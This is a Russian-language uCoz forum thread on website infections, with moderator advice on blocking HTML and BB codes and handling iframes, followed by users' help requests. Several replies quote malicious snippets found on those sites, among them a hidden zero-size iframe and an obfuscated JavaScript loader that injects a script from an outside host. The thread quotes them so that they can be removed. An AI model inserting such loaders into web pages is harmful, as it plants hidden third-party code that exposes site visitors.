Страница 1 из 149123148149»
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Личный менеджер
    Сообщений: 23230
    Репутация: 4881

    Сообщение # 2 | 22:08:04
    Как предотвратить попадание вредоносных ссылок на сайт

    • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
    • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [URL]и [IMG], так же можно запретить использование BB кодов в гостевой и комментариях.
    • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
    • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
    • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




    Диагностика

    • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
      В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
    • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
    • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
      Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


    Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

    • Вы должны предоставить ссылку на сайт!
    • Вы должны дать описание проблемы:
      1)на какой странице сайта обнаруживается проблема (ссылка)2) проблема обнаруживается только под логином или под гостем тоже3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки

    Полезные ссылки:

    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:




    О коде
    Код
    <iframe height="0" width="0" frameborder="0" scrolling="no" src="http://htz-2.xstats.in/index.cnt?c[0]=ucoz_li"></iframe>
    всем читать тут http://forum.ucoz.ru/forum/45-34556-946766-16-1353233721

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Личный менеджер
    Сообщений: 23230
    Репутация: 4881

    Сообщение # 3 | 17:00:09
    Пробувавы несколько браузеров, сайт неотрывает? В чом может быть проблема? Ссылка на сайт hizon.ucoz.ru Блокирует антивирус!

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Hizon
    Сообщений: 41
    Сообщение # 4 | 17:00:09
    Пробувавы несколько браузеров, сайт неотрывает? В чом может быть проблема? Ссылка на сайт hizon.ucoz.ru Блокирует антивирус!
    Hizon
    Сообщений: 41
    Репутация: 2

    Сообщение # 5 | 17:00:09
    Пробувавы несколько браузеров, сайт неотрывает? В чом может быть проблема? Ссылка на сайт hizon.ucoz.ru Блокирует антивирус!
    Shoop1
    Сообщений: 42
    Репутация: -6

    Сообщение # 6 | 12:14:29
    Помогите убрать рекламу
    http://cs-zona.ru
    webanet
    Личный менеджер
    Сообщений: 23230
    Репутация: 4881

    Сообщение # 7 | 12:19:28
    Shoop1,
    Код
    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      var s = "http://place.kremlinstronghold.info/?";
      s += 793349 + "=cThxdyN1bGE4MTU1PDIjY2p3aGRxdjh3anEja2pkYXBpcTg0";
      script.src = s;
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
      })(window);
      </script>


    так же надо убрать копирайт из ноиндекса

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ВоЛЬнОмЕчТаТеЛЬ
    Сообщений: 1
    Репутация: 0

    Сообщение # 8 | 21:51:47
    Здравствуйте. помогите пожалуйста убрать банер внижнем углу вылазит
    сайт:
    http://respekt.august4u.ru/
    webanet
    Личный менеджер
    Сообщений: 23230
    Репутация: 4881

    Сообщение # 9 | 21:59:31
    ВоЛЬнОмЕчТаТеЛЬ, убрать сторонний виджет

    Код
    <script language="JavaScript" src="http://101widgets.com/05022001/170/40"></script>
    в него вшита реклама

    и автосерф это плохо

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amaligama
    Сообщений: 3
    Репутация: 0

    Сообщение # 10 | 10:48:52
    Здравствуйте!
    Alhim.kz
    Заблокирован и пишет.
    Опасный сайт
    Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
    Opera Software настоятельно не рекомендует посещать эту страницу.
    Vera5543
    Сообщений: 8
    Репутация: 7

    Сообщение # 11 | 11:23:32

    Только недавно удалила один вирус, вот опять новое всплывающее окно sad Появляется не только на главной, адрес сайта Светлячки


    Добавлено (17 Май 2013, 11:23:32)
    ---------------------------------------------
    Справилась сама, удалив ненужные скрипты из шаблонов, по аналогии с предыдущим случаем. Помощь не нужна, спасибо smile Единственно вопрос: если я не вносила никаких изменений, откуда появляются эти скрипты в кодах?
    Прикрепления: 2854446.png(54Kb) · 1831450.png(10Kb)
    Сообщение отредактировал Vera5543 - Пятница, 17 Май 2013, 11:25:35
    zixi1
    Сообщений: 42
    Репутация: 26

    Сообщение # 12 | 12:31:44
    Приветствую. На сайте http://fsd-wm.ru/ похоже есть вирус. Припереходе в панели управления и иногда по страницам сайта перекидывает на страницы вконтакте, заблокированные. Порылся но вируса так и не нашел. Онлайн антивирусы ругаются только на баннер юкоза. Помогите найти корень зла. Заранее благодарен.

    Добавлено (17 Май 2013, 12:31:44)
    ---------------------------------------------
    Вроде нашел корень зла
    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"</script>

    Как думаете вирус?

    $Vladimir$
    $SUPPORT$
    Сообщений: 6258
    Репутация: 971

    Сообщение # 13 | 13:33:31
    Цитата (Vera5543)
    Единственно вопрос: если я не вносила никаких изменений, откуда появляются эти скрипты в кодах?


    Судя по всему ваш парольuID профиля скомпрометирован.

    Вам нужно ознакомится с темами форума:
    http://u.to/WlMKAQ
    http://u.to/cFMKAQ

    $Vladimir$
    $SUPPORT$
    Сообщений: 6258
    Репутация: 971

    Сообщение # 14 | 13:35:49
    Цитата (zixi1)
    Как думаете вирус?


    zixi1, а вы решили что это модная рюшка для сайта?

    camper93reg
    Сообщений: 120
    Репутация: 31

    Сообщение # 15 | 15:01:45
    http://www.css-our.ru/

    опять яндекс заблокировал... вот ссылка на опасную страницу http://www.css-our.ru/forum
    а вот примечание Поведенческий анализ

    Помог? ставь +'uk к репке )))
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Страница 1 из 149123148149»
    Поиск: